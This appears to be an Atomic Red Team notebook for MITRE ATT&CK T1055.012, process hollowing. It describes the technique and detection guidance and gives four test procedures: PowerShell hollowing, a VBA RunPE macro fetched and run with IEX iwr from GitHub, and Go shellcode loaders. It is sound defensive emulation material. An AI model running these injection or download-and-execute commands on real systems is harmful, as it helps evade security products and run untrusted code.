# T1055.012 - Process Hollowing
Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  

Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code>  before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)

This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. 

## Atomic Tests

### Atomic Test #1 - Process Hollowing using PowerShellThis test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.
Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
$ppid=Get-Process explorer | select -expand id
Start-Hollow -Sponsor "C:\Windows\System32\notepad.exe" -Hollow "C:\Windows\System32\cmd.exe" -ParentPID $ppid -Verbose
```

In [ ]:
Invoke-AtomicTest T1055.012 -TestNumbers 1

#### Cleanup: 
```powershell
Stop-Process -Name "notepad" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1055.012 -TestNumbers 1 -Cleanup

### Atomic Test #2 - RunPE via VBA
This module executes notepad.exe from within the WINWORD.EXE process

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1055.012 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "Word" -sub "Exploit"
```

In [ ]:
Invoke-AtomicTest T1055.012 -TestNumbers 2

### Atomic Test #3 - Process Hollowing in Go using CreateProcessW WinAPICreates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program "C:\Windows\System32\werfault.exe" -debug
```

In [ ]:
Invoke-AtomicTest T1055.012 -TestNumbers 3

#### Cleanup: 
```powershell
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "werfault" -ErrorAction SilentlyContinue
```

In [ ]:
Invoke-AtomicTest T1055.012 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
allows for the retrieval of output generated from executed shellcode.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe -program "C:\Windows\System32\werfault.exe" -debug
```

In [ ]:
Invoke-AtomicTest T1055.012 -TestNumbers 4

#### Cleanup: 
```powershell
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "werfault" -ErrorAction SilentlyContinue```

In [ ]:
Invoke-AtomicTest T1055.012 -TestNumbers 4 -Cleanup

## Detection
Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as <code>CreateRemoteThread</code>, <code>SuspendThread</code>/<code>SetThreadContext</code>/<code>ResumeThread</code>, and those that can be used to modify memory within another process, such as <code>VirtualAllocEx</code>/<code>WriteProcessMemory</code>, may be used for this technique.(Citation: Elastic Process Injection July 2017)

Processing hollowing commonly involves spawning an otherwise benign victim process. Consider correlating detections of processes created in a suspended state (ex: through API flags or process’ thread metadata) with other malicious activity such as attempts to modify a process' memory, especially by its parent process, or other abnormal process behavior.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)

Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.